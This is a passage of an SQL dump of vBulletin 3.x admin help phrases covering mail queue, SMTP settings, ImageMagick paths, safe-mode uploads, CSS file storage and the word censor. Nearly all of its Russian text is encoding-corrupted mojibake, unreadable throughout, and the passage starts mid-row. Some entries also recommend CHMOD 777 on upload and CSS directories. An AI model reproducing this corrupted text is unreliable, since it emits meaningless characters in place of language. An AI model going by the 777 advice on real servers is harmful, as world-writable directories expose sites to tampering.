÷åÃèå.', 'vbulletin', 'zCarot', 1206966073, '3.7.0 Release Candidate 2'),
(23105, -1, 'options_options_cachemaxage_title', 'cphelptext', 'Ñðîê õðà ÃÃ¥Ãèÿ êýøèðîâà ÃÃûõ ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(23106, -1, 'options_options_threadviewslive_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî ñ÷¸ò÷èê ïðîñìîòðà òåìû áóäåò îáÃîâëÿòüñÿ ñðà çó æå ïîñëå ïðîñìîòðà å¸ ïîëüçîâà òåëåì.  ïðîòèâÃîì ñëó÷à å, îà áóäåò ñîõðà ÃÃ¥Ã, à îáÃîâëÿòüñÿ áóäåò òîëüêî êà æäûé ÷à ñ (ïî óìîë÷à Ãèþ), ó÷èòûâà ÿ âñå ïîñåùåÃèÿ. Ìû ðåêîìåÃäóåì âûêëþ÷èòü ýòó îïöèþ äëÿ áîëüøèõ ôîðóìîâ, òà ê êà ê ýòî ìîæåò ïðèâåñòè ê ñåðüåçÃûì ïðîáëåìà ì ïðîèçâîäèòåëüÃîñòè.', 'vbulletin', '', 0, ''),
(23107, -1, 'options_options_threadviewslive_title', 'cphelptext', 'ÎáÃîâëÿòü ñ÷¸ò÷èê ïðîñìîòðà òåìû ÃåìåäëåÃÃî', 'vbulletin', '', 0, ''),
(23108, -1, 'options_options_attachmentviewslive_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, ñ÷¸ò÷èê ïðîñìîòðà âëîæåÃèé áóäåò îáÃîâëÿòüñÿ â ðåà ëüÃîì âðåìåÃè ïðè êà æäîì ïðîñìîòðå âëîæåÃèÿ.  ïðîòèâÃîì ñëó÷à å, ýòîò ñ÷¸ò÷èê áóäåò îáÃîâëÿòüñÿ ðà ç â ÷à ñ (ïî óìîë÷à Ãèþ). Ìû ðåêîìåÃäóåì îòêëþ÷èòü ýòó îïöèþ Ãà áîëüøèõ èëè çà ãðóæåÃÃûõ ôîðóìà õ, ò.ê. îáÃîâëåÃèå â ðåà ëüÃîì âðåìåÃè ìîæåò óäà ðèòü ïî ïðîèçâîäèòåëüÃîñòè.', 'vbulletin', '', 0, ''),
(23109, -1, 'options_options_attachmentviewslive_title', 'cphelptext', 'ÎáÃîâëÿòü ñ÷¸ò÷èê ïðîñìîòðà âëîæåÃèé ÃåìåäëåÃÃî', 'vbulletin', '', 0, ''),
(23110, -1, 'options_options_emailsendnum_text', 'cphelptext', 'Ôîðóì èìååò îãðà Ãè÷èòåëü Ãà îòïðà âêó ïèñåì, ÷òîáû ïðåäîòâðà òèòü ïåðåãðóçêó ïðè ïîñûëêå, åñëè Ãåîáõîäèìî îòïðà âèòü áîëüøîå ÷èñëî ïèñåì (Ãà ïðèìåð, êîãäà ïîÿâèëîñü Ãîâîå ñîîáùåÃèå â òåìå, Ãà êîòîðóþ ïîäïèñà Ãî áîëüøîå ÷èñëî ïîëüçîâà òåëåé). Ãî óìîë÷à Ãèþ, çà ðà ç ìîæÃî îòïðà âèòü 10 ïèñåì. Åñëè ó âà ñ äîâîëüÃî ìîùÃûé ñåðâåð, òî âû ìîæåòå ïîñòà âèòü áîëåå âûñîêîå çÃà ÷åÃèå, Ãî ìû ÃÃ¥ ðåêîìåÃäóåì ñòà âèòü î÷åÃü áîëüøèå çÃà ÷åÃèÿ äëÿ áåçîïà ñÃîé ðà áîòû.', 'vbulletin', '', 0, ''),
(23111, -1, 'options_options_emailsendnum_title', 'cphelptext', 'Êîëè÷åñòâî ýëåêòðîÃÃûõ ïèñåì, îòïðà âëÿåìûõ çà îäèà ðà ç', 'vbulletin', '', 0, ''),
(23112, -1, 'options_options_loadlimit_text', 'cphelptext', 'Ãà ìÃîãèõ *NIX ñèñòåìà õ, âêëþ÷à ÿ Linux, åñòü âîçìîæÃîñòü ïîëó÷åÃèÿ îò îïåðà öèîÃÃîé ñèñòåìû èÃôîðìà öèè î ñîçäà âà åìîé ôîðóìîì Ãà ãðóçêå Ãà ñåðâåð. Äâèæîê ôîðóìà ìîæåò èñïîëüçîâà òü ýòó èÃôîðìà öèþ äëÿ ïðåäîòâðà ùåÃèÿ îäÃîâðåìåÃÃîãî âõîäà Ãà ôîðóì áîëüøîãî ÷èñëà ïîëüçîâà òåëåé, åñëè ñåðâåð ïåðåãðóæåÃ. Çà ãðóçêà ñåðâåðà Ãà *NIX ñèñòåìà õ èçìåðÿåòñÿ ÷èñëà ìè. Îáû÷Ãî Ãà ãðóçêà ÃÃ¥ ïðåâûøà åò 1, îäÃà êî Ãåæåëà òåëüÃî óñòà Ãà âëèâà òü ïðåäåëüÃóþ Ãà ãðóçêó ñòîëü ìà ëîé. Àäåêâà òÃûì çÃà ÷åÃèåì ýòîé îïöèè áóäóò ÷èñëà îò 5 äî 7.', 'vbulletin', '', 0, ''),
(23113, -1, 'options_options_loadlimit_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ çà ãðóçêà Ãà *NIX ñåðâåð', 'vbulletin', '', 0, ''),
(23114, -1, 'options_options_imagetype_text', 'cphelptext', 'Ôîðóì äà ¸ò âîçìîæÃîñòü èñïîëüçîâà òü äâà âà ðèà Ãòà äëÿ óïðà âëåÃèÿ ìèÃèà òþðà ìè âëîæåÃèé, à âà òà ðà ìè è ôîòîãðà ôèÿìè. \r\n\r\nÃåðâûé - GD, êîòîðûé âõîäèò â ñîñòà â PHP 4.3.0 è áîëåå Ãîâûõ âåðñèé, à òà êæå äîñòóïåà äëÿ èñïîëüçîâà Ãèÿ ñî ñòà ðûìè âåðñèÿìè. Ãèáëèîòåêà GD v2+ - ïðåäïî÷òèòåëüÃåå v1+, ïîýòîìó âñåãäà âûáèðà éòå v2, åñëè ó âà ñ åñòü òà êà ÿ âîçìîæÃîñòü. GD ïîääåðæèâà åò ñëåäóþùèå òèïû ôà éëîâ: GIF, JPEG è PNG. \r\n\r\nÂòîðà ÿ ïîääåðæèâà åìà ÿ áèáëèîòåêà - ImageMagick v6 îò ImageMagick Studio LLC. ImageMagick - èñïîëÃÿåìûé èñõîäÃèê, êîòîðûé äîëæåà áûòü óñòà Ãîâëåà Ãà óðîâÃÃ¥ ñåðâåðà , è âûçûâà åìûé PHP. Ôîðóì çà ïðà øèâà åò òîëüêî èñõîäÃèêè identify è convert èç ImageMagick. ImageMagick ïîääåðæèâà åò ñëåäóþùèå òèïû ôà éëîâ: GIF, JPEG, PNG, BMP, TIFF è PSD. ImageMagick òà êæå èìååò áîëåå õîðîøóþ ïîääåðæêó à Ãèìèðîâà ÃÃîãî GIF.', 'vbulletin', '', 0, ''),
(23115, -1, 'options_options_imagetype_title', 'cphelptext', 'Ãèáëèîòåêà îáðà áîòêè èçîáðà æåÃèé', 'vbulletin', '', 0, ''),
(23116, -1, 'options_options_regimagetype_text', 'cphelptext', 'Ôîðóì ïîçâîëÿåò âûáðà òü èç äâóõ âà ðèà Ãòîâ áèáëèîòåê äëÿ ãåÃåðà öèè äèÃà ìè÷åñêèõ èçîáðà æåÃèé äëÿ ïðîâåðîê .\r\n \r\n \r\nÃåðâûé - GD, êîòîðûé âõîäèò â ñîñòà â PHP 4.3.0 è áîëåå Ãîâûõ âåðñèé. Ãðè èñïîëüçîâà Ãèè áèáëèîòåêè GD v2+, òðåáóåòñÿ PHP, ñêîÃôèãóðèðîâà ÃÃûé ñ ïîääåðæêîé freetype2 . Åñëè æå ó âà ñ PHP ñêîÃôèãóðèðîâà à ñ ïîääåðæêîé freetype1, òî èÃîãäà ýòî ìîæåò ïðèâîäèòü ê òîìó, ÷òî òåêñò ÃÃ¥ áóäåò îòîáðà æ¸à Ãà èçîáðà æåÃèè.\r\n\r\n \r\n \r\nÂòîðà ÿ ïîääåðæèâà åìà ÿ áèáëèîòåêà - ImageMagick v6 îò ImageMagick Studio LLC. ImageMagick - èñïîëÃÿåìà ÿ ïðîãðà ììà , êîòîðà ÿ äîëæÃà áûòü óñòà ÃîâëåÃà Ãà óðîâÃÃ¥ ñåðâåðà , è âûçûâà òüñÿ PHP. Ôîðóì çà ïðà øèâà åò òîëüêî identify è convert èç ImageMagick. Imagemagick äîëæåà áûòü ñêîìïèëèðîâà à ñ ïîääåðæêîé Freetype, ÷òîáû êîððåêòÃî îòîáðà æà òü èçîáðà æåÃèÿ äëÿ ïðîâåðîê. Âû ìîæåòå (è ìû ñîâåòóåì âà ì ýòî ñäåëà òü) èñïîëüçîâà òü ñîáñòâåÃÃûå ôîÃîâûå èçîáðà æåÃèÿ è øðèôòû true type, ÷òîáû ñäåëà òü âà øè èçîáðà æåÃèÿ äëÿ ïðîâåðêè óÃèêà ëüÃûìè è, ñëåäîâà òåëüÃî, áîëåå ñëîæÃûìè äëÿ áîòîâ. ÔîÃîâûå èçîáðà æåÃèÿ äîëæÃû èìåòü ðà çìåð 201x61 ïèêñåëåé. Øðèôòû îáÿçà òåëüÃî äîëæÃû áûòü True Type fonts. Ôà éëû ñëåäóåò çà ãðóæà òü â ñîîòâåòñòâóþùèå ïîääèðåêòîðèè images/regimage. ÈìåÃà ôà éëîâ ÃÃ¥ èìåþò çÃà ÷åÃèÿ, ãëà âÃîå èõ ðà ñøèðåÃèå äîëæÃî áûòü äëÿ ôîÃîâûõ èçîáðà æåÃèÿ .jpg, .png èëè .gif, à äëÿ øðèôòîâ - .ttf.', 'vbulletin', 'zCarot', 1192824738, '3.7.0 Beta 1'),
(23117, -1, 'options_options_regimagetype_title', 'cphelptext', 'Ãèáëèîòåêà èçîáðà æåÃèé äëÿ ïðîâåðîê', 'vbulletin', '', 0, ''),
(23118, -1, 'options_options_magickpath_text', 'cphelptext', 'Ãóòü ê èñõîäÃèêà ì ImageMagick 6 (convert è identify). Ãðèìåð:\r\n\r\nUnix: /usr/local/bin/\r\nWindows: C:\\imagemagick\\', 'vbulletin', '', 0, ''),
(23119, -1, 'options_options_magickpath_title', 'cphelptext', 'Ãóòü ê èñõîäÃèêà ì ImageMagick', 'vbulletin', '', 0, ''),
(23120, -1, 'options_options_regimageoption_text', 'cphelptext', 'ÑëîæÃîñòü èçîáðà æåÃèé äëÿ ïðîâåðîê êîÃòðîëèðóåòñÿ ýòèìè îïöèÿìè. ×åì áîëüøå âûáðà Ãî îïöèé, òåì ñëîæÃåå áóäåò ãåÃåðèðóåìîå èçîáðà æåÃèå. Êà æäà ÿ îïöèÿ ïîäðà çóìåâà åò, ÷òî îÃà áóäåò ïðèìåÃÿòüñÿ ê ëþáîìó ãåÃåðèðóåìîìó ñèìâîëó.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23121, -1, 'options_options_regimageoption_title', 'cphelptext', 'Îïöèè èçîáðà æåÃèé äëÿ ïðîâåðîê', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23122, -1, 'options_options_safeupload_text', 'cphelptext', 'Åñëè ñåðâåð çà ïóùåà â áåçîïà ñÃîì ðåæèìå, òî âà ì ñëåäóåò óêà çà òü çäåñü \"Äà \". Âû ìîæåòå óçÃà òü çà ïóùåà ëè áåçîïà ñÃûé ðåæèì, ïðîñìîòðåâ âà øó ñòðà Ãèöó phpinfo è Ãà éäÿ òà ì ïà ðà ìåòð Safe Mode.', 'vbulletin', '', 0, ''),
(23123, -1, 'options_options_safeupload_title', 'cphelptext', 'Âêëþ÷èòü çà ãðóçêó â áåçîïà ñÃîì ðåæèìå', 'vbulletin', '', 0, ''),
(23124, -1, 'options_options_tmppath_text', 'cphelptext', 'Åñëè âà ø ñåðâåð ðà áîòà åò â áåçîïà ñÃîì ðåæèìå, òî âà ì ñëåäóåò óêà çà òü äèðåêòîðèþ, äîñòóïÃóþ äëÿ çà ïèñè äëÿ PHP, â êîòîðîé CHMOD 777. ÃŽÃà áóäåò ñ÷èòà òüñÿ âðåìåÃÃîé äèðåêòîðèåé äëÿ çà ãðóçêè ôà éëîâ äî òîãî, êà ê îÃè áóäóò ïåðåìåùåÃû â áà çó äà ÃÃûõ. ÃÃ¥ äîáà âëÿéòå ñëåøà â êîÃöå ñòðîêè.', 'vbulletin', '', 0, ''),
(23125, -1, 'options_options_tmppath_title', 'cphelptext', 'ÂðåìåÃÃà ÿ äèðåêòîðèÿ áåçîïà ñÃîãî ðåæèìà ', 'vbulletin', '', 0, ''),
(23126, -1, 'options_options_copypostindex_text', 'cphelptext', 'ÌîæÃî ÃÃ¥ ïðîèçâîäèòü èÃäåêñà öèþ ñêîïèðîâà ÃÃîé òåìû, òà ê êà ê ïåðâîÃà ÷à ëüÃà ÿ òåìà óæå ïðîèÃäåêñèðîâà Ãà . ÎäÃà êî, âû ìîæåòå ïðîèÃäåêñèðîâà òü ñêîïèðîâà ÃÃûå òåìû äëÿ ïîëÃîòû êîïèè.', 'vbulletin', '', 0, ''),
(23127, -1, 'options_options_copypostindex_title', 'cphelptext', 'Äóáëèðîâà Ãèå èÃôîðìà öèè îá èÃäåêñà õ ïîèñêà ïðè êîïèðîâà Ãèè òåìû', 'vbulletin', '', 0, ''),
(23128, -1, 'options_options_usemailqueue_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî áóäåò à êòèâèðîâà Ãà ïî÷òîâà ÿ î÷åðåäü, ÷òî ïðèâåäåò ê òîìó, ÷òî ïîäïèñ÷èêè Ãà òåìû/ðà çäåëû áóäóò ïîëó÷à òü ïèñüìà ïà êåòà ìè äëÿ îáëåã÷åÃèÿ Ãà ãðóçêè Ãà ñåðâåð. Âà æÃûå ýëåêòðîÃÃûå ïèñüìà , êà ê, Ãà ïðèìåð, ïðèâåòñòâåÃÃîå ïèñüìî äëÿ à êòèâà öèè èëè ïèñüìî î ïîòåðå ïà ðîëÿ, áóäóò îòïðà âëåÃû ÃÃ¥ çà âèñèìî îò ýòîãî ïà ðà ìåòðà . Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî äîëæÃû óêà çà òü ïà ðà ìåòð \"Êîëè÷åñòâî ýëåêòðîÃÃûõ ïèñåì, îòïðà âëÿåìûõ çà îäèà ðà ç\".', 'vbulletin', '', 0, ''),
(23129, -1, 'options_options_usemailqueue_title', 'cphelptext', 'Èñïîëüçîâà òü ïî÷òîâóþ î÷åðåäü', 'vbulletin', '', 0, ''),
(23130, -1, 'options_options_needfromemail_text', 'cphelptext', 'Ãåêîòîðûå email-ñåðâåðû òðåáóþò ïà ðà ìåòð \"-f\" äëÿ îòïðà âëåÃèÿ ñ ïèñüìîì çà ïðîñà èç PHP. Åñëè ïîëüçîâà òåëè ÃÃ¥ ïîëó÷à þò ïèñåì ñ âà øåãî ôîðóìà , òî âû ìîæåòå ïîïðîáîâà òü âêëþ÷èòü ýòó îïöèþ.', 'vbulletin', '', 0, ''),
(23131, -1, 'options_options_needfromemail_title', 'cphelptext', 'Óñòà Ãîâèòü ïà ðà ìåòð \"-f\"', 'vbulletin', '', 0, ''),
(23132, -1, 'options_options_languageid_text', 'cphelptext', 'Âûáîð ÿçûêà ïî óìîë÷à Ãèþ äëÿ âà øåãî ôîðóìà èç ñïèñêà òåõ ÿçûêîâ, êîòîðûå âû óñòà Ãîâèëè. Ãòîò ÿçûê áóäåò èñïîëüçîâà òüñÿ äëÿ âñåõ ãîñòåé è òåõ ïîëüçîâà òåëåé, êîòîðûå ÃÃ¥ óñòà Ãîâèëè åãî â ñâîåì ïðîôèëå âðó÷Ãóþ.', 'vbulletin', '', 0, ''),
(23133, -1, 'options_options_languageid_title', 'cphelptext', 'ßçûê ïî óìîë÷à Ãèþ', 'vbulletin', '', 0, ''),
(23134, -1, 'options_options_styleid_text', 'cphelptext', 'Âû ìîæåòå óêà çà òü ñòèëü ïî óìîë÷à Ãèþ äëÿ âà øåãî ôîðóìà èç òåõ, êîòîðûå âû ñîçäà ëè èëè äîáà âèëè â ðà çäåë \"Ñòèëè è øà áëîÃû\". Âñå ãîñòè è ó÷à ñòÃèêè, ÃÃ¥ óêà çà âøèå ñîáñòâåÃÃûé âûáîð ñòèëÿ â ñâîèõ Ãà ñòðîéêà õ, áóäóò èñïîëüçîâà òü ýòîò ñòèëü.', 'vbulletin', '', 0, ''),
(23135, -1, 'options_options_styleid_title', 'cphelptext', 'Ñòèëü ïî óìîë÷à Ãèþ', 'vbulletin', '', 0, ''),
(23136, -1, 'options_options_allowchangestyles_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè ïîëüçîâà òåëè ñìîãóò âûáèðà òü ñòèëü ôîðóìà ñðåäè óêà çà ÃÃûõ âà ìè â ðà çäåëå \"Ñòèëè è øà áëîÃû\" è äîñòóïÃûõ ïîëüçîâà òåëÿì.', 'vbulletin', '', 0, ''),
(23137, -1, 'options_options_allowchangestyles_title', 'cphelptext', 'Ãà çðåøèòü ïîëüçîâà òåëÿì âûáèðà òü ñòèëè', 'vbulletin', '', 0, ''),
(23138, -1, 'options_options_cleargifurl_text', 'cphelptext', 'Ôà éë clear.gif èñïîëüçóåòñÿ êà ê çà ïîëÃèòåëü â ÃóæÃûõ ìåñòà õ ôîðóìà , à òà êæå ïðè îòñóòñòâèè à âà òà ðà . Îáû÷Ãî çäåñü óêà çûâà åòñÿ \'clear.gif\', êîòîðûé Ãà õîäèòñÿ â êîðÃåâîé äèðåêòîðèè ôîðóìà (òà ì æå, ãäå è forumdisplay.php). Òóò ÄÎËÆÅà áûòü óêà çà à à äðåñ îò êîðÃåâîãî êà òà ëîãà ôîðóìà .', 'vbulletin', '', 0, ''),
(23139, -1, 'options_options_cleargifurl_title', 'cphelptext', 'Ãóòü ê ôà éëó clear.gif', 'vbulletin', '', 0, ''),
(23140, -1, 'options_options_storecssasfile_text', 'cphelptext', 'Åñëè ýòîò ïà ðà ìåòð âêëþ÷åÃ, òî âû ìîæåòå õðà Ãèòü CSS âà øèõ ñòðà Ãèö â âèäå ôà éëîâ, ÷òî óìåÃüøèò ðà çìåð âà øèõ ñòðà Ãèö (òà êæå CSS ôà éë ìîæåò áûòü êýøèðîâà à ëîêà ëüÃî è ññûëà òüñÿ Ãà êà æäóþ ñòðà Ãèöó, âìåñòî òîãî, ÷òîáû çà ãðóæà òü âñþ èÃôîðìà öèþ CSS ñ êà æäîé ñòðà Ãèöû). Åñëè âû âêëþ÷èòå ýòîò ïà ðà ìåòð, òî âà ì ñëåäóåò ñîçäà òü äèðåêòîðèþ ñ Ãà çâà Ãèåì \"vbulletin_css\" â ïà ïêå \"clientscript\" âà øåãî ôîðóìà è äà òü ïðà âà ñåðâåðó ñîçäà âà òü, çà ïèñûâà òü è óäà ëÿòü ôà éëû â ýòîé äèðåêòîðèè. (Îáû÷Ãî ýòî óêà çûâà åòñÿ ñ óñòà Ãîâêîé CHMOD 777 Ãà ýòó äèðåêòîðèþ.)', 'vbulletin', '', 0, ''),
(23141, -1, 'options_options_storecssasfile_title', 'cphelptext', 'Õðà ÃÃ¥Ãèå òà áëèöû ñòèëåé CSS â ôà éëà õ', 'vbulletin', '', 0, ''),
(23142, -1, 'options_options_usepopups_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî îïðåäåëåÃÃûå ýëåìåÃòû ñòðà Ãèöû áóäóò ïîìåùåÃû âÃóòðè âñïëûâà þùåãî ìåÃþ. Ãà ïðèìåð, Ãåêîòîðûå ññûëêè Ãà âèãà öèîÃÃîé ïà Ãåëè ðà çìåùåÃû âÃóòðè âñïëûâà þùåãî ìåÃþ äëÿ ñîõðà ÃÃ¥Ãèÿ ìåñòà . Òîæå ñà ìîå ñäåëà Ãî äëÿ ðà çëè÷Ãûõ îïöèé ïî óïðà âëåÃèþ òåìà ìè è ðà çäåëà ìè è ò.ä. \r\n\r\nÃÃ¥ âñå îáîçðåâà òåëè ïîääåðæèâà þò âñïëûâà þùèå ìåÃþ. Ôîðóì à âòîìà òè÷åñêè îïðåäåëÿåò îáîçðåâà òåëü êëèåÃòà è âûêëþ÷à åò èõ ïðè Ãåîáõîäèìîñòè.', 'vbulletin', '', 0, ''),
(23143, -1, 'options_options_usepopups_title', 'cphelptext', 'Èñïîëüçîâà Ãèå âñïëûâà þùåãî DHTML ìåÃþ', 'vbulletin', '', 0, ''),
(23144, -1, 'options_options_legacypostbit_text', 'cphelptext', 'Îïöèÿ óïðà âëÿåò îòîáðà æåÃèåì êà æäîãî èç ñîîáùåÃèé ïðè ïðîñìîòðå òåìû. Ãîâûé (ãîðèçîÃòà ëüÃûé) ñòèëü ðà ñïîëà ãà åò èÃôîðìà öèþ à âòîðà ñîîáùåÃèÿ ÃÀÄ ñîäåðæà Ãèåì ñîîáùåÃèÿ, ñòà ðûé æå (âåðòèêà ëüÃûé) - ÑËÅÂÀ îò òåëà ñîîáùåÃèÿ.', 'vbulletin', '', 0, ''),
(23145, -1, 'options_options_legacypostbit_title', 'cphelptext', 'Èñïîëüçîâà òü ñòà ðûé (âåðòèêà ëüÃûé) øà áëîà ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(23146, -1, 'options_options_enableemail_text', 'cphelptext', 'Ãòà îïöèÿ äîëæÃà áûòü âêëþ÷åÃà äëÿ ðà áîòû ôóÃêöèé ïî îòïðà âêå ýëåêòðîÃÃîé ïî÷òû, âêëþ÷à ÿ ïîäòâåðæäåÃèå à äðåñà ýëåêòðîÃÃîé ïî÷òû, óâåäîìëåÃèå î Ãîâîì ñîîáùåÃèè è ò.ä..', 'vbulletin', '', 0, ''),
(23147, -1, 'options_options_enableemail_title', 'cphelptext', 'Âêëþ÷èòü ôóÃêöèè ýëåêòðîÃÃîé ïî÷òû', 'vbulletin', '', 0, ''),
(23148, -1, 'options_options_displayemails_text', 'cphelptext', 'Åñëè âû âûêëþ÷èòå ýòó îïöèþ, òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò êîÃòà êòèðîâà òü ñ äðóãèìè ïîëüçîâà òåëÿìè, èñïîëüçóÿ îòïðà âêó ýëåêòðîÃÃûõ ïèñåì ÷åðåç ôîðóì. Äà æå åñëè âû âêëþ÷èòå ýòó îïöèþ, òî âû ìîæåòå çà ïðåòèòü îòîáðà æåÃèå à äðåñîâ ýëåêòðîÃÃîé ïî÷òû, ñ ïîìîùüþ îïöèè \"Îòïðà âëÿòü ýëåêòðîÃÃîå ïèñüìî, ÃÃ¥ ïîêà çûâà ÿ à äðåñ\".', 'vbulletin', '', 0, ''),
(23149, -1, 'options_options_displayemails_title', 'cphelptext', 'Ãà çðåøèòü ïîëüçîâà òåëÿì îòïðà âëÿòü äðóã äðóãó ýëåêòðîÃÃûå ïèñüìà ', 'vbulletin', '', 0, ''),
(23150, -1, 'options_options_secureemail_text', 'cphelptext', 'Åñëè âêëþ÷åÃî, òî ïîëüçîâà òåëè ñìîãóò îòïðà âëÿòü ïèñüìà äðóã äðóãó ÷åðåç ôîðìó, áåç óêà çà Ãèÿ à äðåñà ýëåêòðîÃÃîé ïî÷òû ïîëó÷à òåëÿ.  ïðîòèâÃîì ñëó÷à å äëÿ îòïðà âêè ïèñüìà áóäåò ïðîñòî îòîáðà æåà à äðåñ ýëåêòðîÃÃîé ïî÷òû ó÷à ñòÃèêà . ×òîáû ýòîò ïà ðà ìåòð ðà áîòà ë, âà ì ñëåäóåò âêëþ÷èòü ïà ðà ìåòð \"Ãà çðåøèòü ïîëüçîâà òåëÿì îòïðà âëÿòü ýëåêòðîÃÃîå ïèñüìà äðóã äðóãó\".', 'vbulletin', '', 0, ''),
(23151, -1, 'options_options_secureemail_title', 'cphelptext', 'Îòïðà âëÿòü ýëåêòðîÃÃîå ïèñüìî, ÃÃ¥ ïîêà çûâà ÿ à äðåñ', 'vbulletin', '', 0, ''),
(23152, -1, 'options_options_emailfloodtime_text', 'cphelptext', 'Ãòî ÷èñëî ñåêóÃä, â òå÷åÃèå êîòîðûõ ïîñëå îòïðà âêè ýëåêòðîÃÃîãî ïèñüìà ïîëüçîâà òåëü ÃÃ¥ ñìîæåò îòïðà âèòü åù¸ îäÃî ïèñüìî. Ãòî ñäåëà Ãî äëÿ òîãî, ÷òîáû ïðåäîòâðà òèòü ñïà ììèÃã ÷åðåç âà ø ôîðóì. Óñòà Ãîâèòå 0, ÷òîáû îòêëþ÷èòü ýòó îïöèþ.', 'vbulletin', '', 0, ''),
(23153, -1, 'options_options_emailfloodtime_title', 'cphelptext', 'Ãðåäîòâðà ùåÃèå ôëóäà ïðè îòïðà âêå ýëåêòðîÃÃûõ ïèñåì', 'vbulletin', '', 0, ''),
(23154, -1, 'options_options_use_smtp_text', 'cphelptext', 'Ó PHP åñòü ñâîè óêà çà Ãèÿ Ãà ñ÷¸ò ýëåêòðîÃÃîé ïî÷òû ïðè ñîåäèÃÃ¥Ãèè ñ email-ñåðâåðîì. Ãòè óêà çà Ãèÿ ìîæÃî óçÃà òü Ãà ýòîé ñòðà Ãèöå . \r\n\r\nÂû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ, ÷òîáû óêà çà òü ñâîé ïî÷òîâûé ñåðâåð. Ãòî ïîçâîëèò èñïîëüçîâà òü ïî÷òîâûé ñåðâåð, îòëè÷Ãûé îò òîãî, ÷òî óêà çà à â êîÃôèãóðà öèè PHP.', 'vbulletin', '', 0, ''),
(23155, -1, 'options_options_use_smtp_title', 'cphelptext', 'Email ÷åðåç SMTP', 'vbulletin', '', 0, ''),
(23156, -1, 'options_options_smtp_host_text', 'cphelptext', 'Àäðåñ ñåðâåðà äîëæåà áûòü â âèäå ïîëÃîãî äîìåÃÃîãî èìåÃè (êà ê smtp.gmail.com), èëè IP à äðåñà (êà ê 65.123.200.5), èëè êà êîãî-ëèáî äðóãîãî à äðåñà . \r\n\r\nÈñïîëüçóéòå \"localhost\" (áåç êà âû÷åê), åñëè ñåðâåð Ãà õîäèòñÿ Ãà ýòîì æå êîìïüþòåðå, ÷òî è ñà éò.', 'vbulletin', '', 0, ''),
(23157, -1, 'options_options_smtp_host_title', 'cphelptext', 'Àäðåñ SMTP ñåðâåðà ', 'vbulletin', '', 0, ''),
(23158, -1, 'options_options_smtp_port_text', 'cphelptext', 'Ñåðâåðû SMTP îáû÷Ãî îáñëóæèâà þò 25 ïîðò. Åñëè âà ø SMTP ñåðâåð èñïîëüçóåò äðóãîé ïîðò, òî çäåñü âû ìîæåòå óêà çà òü êà êîé èìåÃÃî.', 'vbulletin', '', 0, ''),
(23159, -1, 'options_options_smtp_port_title', 'cphelptext', 'Ãîðò SMTP', 'vbulletin', '', 0, ''),
(23160, -1, 'options_options_smtp_user_text', 'cphelptext', 'Ãåêîòîðûå SMTP ñåðâåðû òðåáóþò à óòåÃòèôèêà öèþ.  ýòîì ïîëå âû ìîæåòå óêà çà òü èìÿ ïîëüçîâà òåëÿ äëÿ à óòåÃòèôèêà öèè.', 'vbulletin', '', 0, ''),
(23161, -1, 'options_options_smtp_user_title', 'cphelptext', 'Èìÿ ïîëüçîâà òåëÿ SMTP', 'vbulletin', '', 0, ''),
(23162, -1, 'options_options_smtp_pass_text', 'cphelptext', 'Åñëè âà ø SMTP ñåðâåð òðåáóåò à óòåÃòèôèêà öèþ, òî âà ì ñëåäóåò óêà çà òü çäåñü èìÿ ïîëüçîâà òåëÿ è ïà ðîëü. Ãòî ïîëå ñîäåðæèò ïà ðîëü SMTP.', 'vbulletin', '', 0, ''),
(23163, -1, 'options_options_smtp_pass_title', 'cphelptext', 'Ãà ðîëü SMTP', 'vbulletin', '', 0, ''),
(23164, -1, 'options_options_smtp_tls_text', 'cphelptext', 'Åñëè âû âêëþ÷èëè îòïðà âêó ïèñåì ÷åðåç SMTP è âà ø ñåðâåð òðåáóåò áåçîïà ñÃîå ñîåäèÃÃ¥Ãèå, òî âûáåðèòå ñîîòâåòñòâóþùóþ îïöèþ. Ãòî òðåáóåò âñòðîåÃÃóþ ïîääåðæêó OpenSSL â PHP. Ãîääåðæêà TLS òðåáóåò PHP 5.1.0+', 'vbulletin', 'zCarot', 1229522245, '3.8.0 Release Candidate 2'),
(23165, -1, 'options_options_smtp_tls_title', 'cphelptext', 'Ãåçîïà ñÃîå ñîåäèÃÃ¥Ãèå SMTP', 'vbulletin', '', 0, ''),
(23166, -1, 'options_options_enablecensor_text', 'cphelptext', 'Âû ìîæåòå ïîäâåðãà òü öåÃçóðå Ãåêîòîðûå ñëîâà Ãà âà øåì ôîðóìå, ãäå áû îÃè Ãè Ãà õîäèëèñü: â ñîîáùåÃèÿõ èëè çà ãîëîâêà õ. ×òîáû âêëþ÷èòü öåÃçóðó, óñòà Ãîâèòå ýòó îïöèþ â \"Äà \".', 'vbulletin', '', 0, ''),
(23167, -1, 'options_options_enablecensor_title', 'cphelptext', 'Âêëþ÷èòü à âòî-öåÃçîð', 'vbulletin', '', 0, ''),
(23168, -1, 'options_options_censorchar_text', 'cphelptext', 'Åñëè ñëîâî òðåáóåòñÿ ïîäâåðãÃóòü öåÃçóðå, òî óêà çà ÃÃûé çäåñü ñèìâîë çà ìåÃèò ÃåöåÃçóðÃóþ ÷à ñòü ñëîâà . Ãà ïðèìåð åñëè ñëîâî \"õðåÃ\" ïîäëåæèò öåÃçóðå è â ýòîé îïöèè óñòà Ãîâëåà ñèìâîë \"*\", òî ñëîâî \"õðåÃîâèÃà \" ïîñëå îáðà áîòêè à âòîöåÃçîðîì áóäåò âûãëÿäåòü êà ê \"****îâèÃà \".', 'vbulletin', '', 0, ''),
(23169, -1, 'options_options_censorchar_title', 'cphelptext', 'Ñèìâîë-çà ìåÃà äëÿ à âòî-öåÃçîðà ', 'vbulletin', '', 0, ''),
